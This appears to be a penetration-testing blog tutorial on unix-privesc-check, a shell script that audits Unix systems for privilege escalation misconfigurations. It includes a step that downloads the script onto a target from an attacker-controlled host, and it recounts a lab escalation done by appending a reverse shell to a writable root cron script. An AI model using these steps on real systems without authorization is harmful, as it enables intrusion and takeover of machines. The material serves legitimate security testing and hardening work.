unix-privesc-check: Identifying Privilege Escalation Paths on Unix Systems

unix-privesc-check: Identifies privilege escalation paths on Unix systems

Once I’ve got a foothold on a Unix or Linux box during an authorized penetration test, the next question is always the same: how do I get from this low-privilege shell to root? unix-privesc-check is one of the older, still genuinely useful tools for answering that question automatically — it scans the local system for common misconfigurations that could allow privilege escalation and reports them in a single, readable output.

What Is unix-privesc-check?

unix-privesc-check is a shell script (no compiled binary, no dependencies beyond standard Unix utilities) that audits a Unix/Linux system for privilege escalation vectors. It checks things like world-writable files owned by root, insecure $PATH configurations, misconfigured cron jobs, weak file permissions on sensitive files (/etc/passwd, /etc/shadow, SSH keys), SUID/SGID binaries, and NFS export misconfigurations.

Because it’s pure shell, it runs on virtually any Unix-like system (Linux, Solaris, AIX, HP-UX, macOS to a degree) without needing a compiler or extra packages — a real advantage during post-exploitation when you can’t easily bring in new dependencies.

How It Works Internally

The script systematically walks through a checklist of known privilege escalation patterns:

  • File permission checks — searches the filesystem for world-writable files/directories owned by root or other privileged users, since a low-privilege user could modify them to inject malicious code that root later executes.
  • PATH analysis — inspects the $PATH environment variable and the PATH used inside root’s cron jobs/scripts for writable directories that appear before trusted system directories (a classic PATH-hijacking vector).
  • Cron job auditing — reads /etc/crontab, /etc/cron.d/, and user crontabs, checking whether the scripts they invoke are writable by non-root users.
  • SUID/SGID binary enumeration — lists binaries with the setuid/setgid bit set, since many privilege escalation techniques revolve around exploiting misconfigured or vulnerable SUID binaries.
  • Service and startup script checks — checks init scripts and systemd unit files for insecure permissions.
  • NFS export checks — flags exports configured with no_root_squash, which can allow a remote root user to write files as root on the local filesystem.

It has two run modes: “standard” (checks accessible to the current user) and “detailed,” which does deeper checks and typically requires root to run fully (used more for a defensive self-audit than an attacker’s low-priv perspective).

Installation

Preinstalled on Kali Linux at /usr/bin/unix-privesc-check. On other systems, it can be pulled directly since it’s a standalone shell script:

sudo apt update
sudo apt install unix-privesc-check

Or simply copy the script to a target system (common in post-exploitation, where you transfer it via scp, curl, or a Python HTTP server):

python3 -m http.server 8000   # on attacker machine, from the directory containing the script
wget http://<attacker_ip>:8000/unix-privesc-check -O /tmp/upc.sh
chmod +x /tmp/upc.sh

Basic Syntax

unix-privesc-check [standard|detailed] > output.txt

Example Run

./unix-privesc-check standard > privesc_report.txt

Sample (trimmed) output:

############################################
unix-privesc-check v1.4 ( http://pentestmonkey.net/tools/unix-privesc-check )

Checking user info
WARNING: uid=1001(webapp) is not root but has a login shell.

Checking system directories
WARNING: /usr/local/bin is world-writable and appears in PATH before /usr/bin

Checking cron jobs
WARNING: /etc/cron.d/backup-job is world-writable
WARNING: Cron job /etc/cron.d/backup-job runs /opt/scripts/backup.sh, which is writable by user webapp

Checking SUID/SGID binaries
WARNING: /usr/bin/old_tool has SUID bit set and is not a standard system binary

Checking file permissions
WARNING: /etc/passwd is world-writable
############################################

Each WARNING line is a candidate escalation path worth manually investigating.

Real-World Use Case (Authorized Lab Only)

On a lab box after gaining a low-privilege web shell as user webapp, I transferred and ran unix-privesc-check, which flagged a cron job running /opt/scripts/backup.sh every five minutes as root — and that script was writable by the webapp user. I appended a reverse shell one-liner to the script, waited for the next cron execution, and caught a root shell — a textbook cron-based privilege escalation, entirely within the authorized scope of the lab exercise.

Workflow Integration

  • LinPEAS/LinEnum → modern, more comprehensive alternatives that check similar things plus kernel exploits, Docker/container escapes, and more; I usually run one of these alongside unix-privesc-check for cross-verification since no single enumeration script catches everything.
  • GTFOBins → once SUID binaries are identified, cross-reference against GTFOBins to find known exploitation techniques for that specific binary.
  • pspy → to observe cron/process activity live rather than relying solely on static config file analysis.

Troubleshooting & Common Mistakes

  • Script requires bash-specific features on a non-bash /bin/sh — some older systems’ default shell doesn’t support all constructs the script uses; explicitly invoke it with bash unix-privesc-check rather than sh unix-privesc-check.
  • Excessive false positives — some “world-writable” findings are legitimate temp directories (/tmp, /var/tmp); focus on world-writable files owned by root outside of expected temp locations.
  • Detailed mode misses deep results without root — remember the detailed mode is partly designed for defensive audits with elevated privileges; from a low-priv shell, standard mode is what reflects a realistic attacker’s view.

Best Practices

  • Always run it as the actual compromised low-privilege user to get a realistic view of what that account can actually exploit.
  • Cross-check findings manually — a script flags candidates, but confirming actual exploitability (e.g., verifying a cron job truly runs as root and truly executes your injected code) is a manual step.
  • Document exact file paths and permission bits found, since those specifics matter for the client’s remediation guidance (e.g., “chmod 750 on /opt/scripts/backup.sh”).

FAQ

Is unix-privesc-check safe to run in production? It’s a read-only auditing script by design (aside from writing its own output) — it doesn’t modify system state, so it’s low-risk, but always run it within scope and with authorization.

Does it work on macOS? Partially — many checks are POSIX-generic and will run, but some Linux-specific paths (like /etc/cron.d/) won’t apply the same way.

How does it compare to LinPEAS? unix-privesc-check is older and narrower in scope but has zero dependencies and extremely broad Unix compatibility; LinPEAS is more comprehensive for modern Linux (covering containers, kernel exploits, colorized output) but is Linux-focused.

Summary

unix-privesc-check remains a solid, dependency-free option for a quick privilege escalation audit on almost any Unix-like system, particularly useful in constrained post-exploitation situations where you can’t easily bring more modern tooling onto the target. I typically run it alongside a more modern script like LinPEAS for broader coverage, but its simplicity and portability still earn it a place in my toolkit.

References

  • Original tool page (pentestmonkey): http://pentestmonkey.net/tools/unix-privesc-check
  • Kali Linux Tools: https://www.kali.org/tools/unix-privesc-check/
  • Man page: man unix-privesc-check
Total
0
Shares

Leave a Reply

Previous Post
Nikto Web Vulnerability Scanner: Comprehensive Guide

Nikto Web Vulnerability Scanner: Comprehensive Guide

Next Post
cutycapt: Captures web screenshots

CutyCapt: Capturing Web Screenshots from the Command Line

Related Posts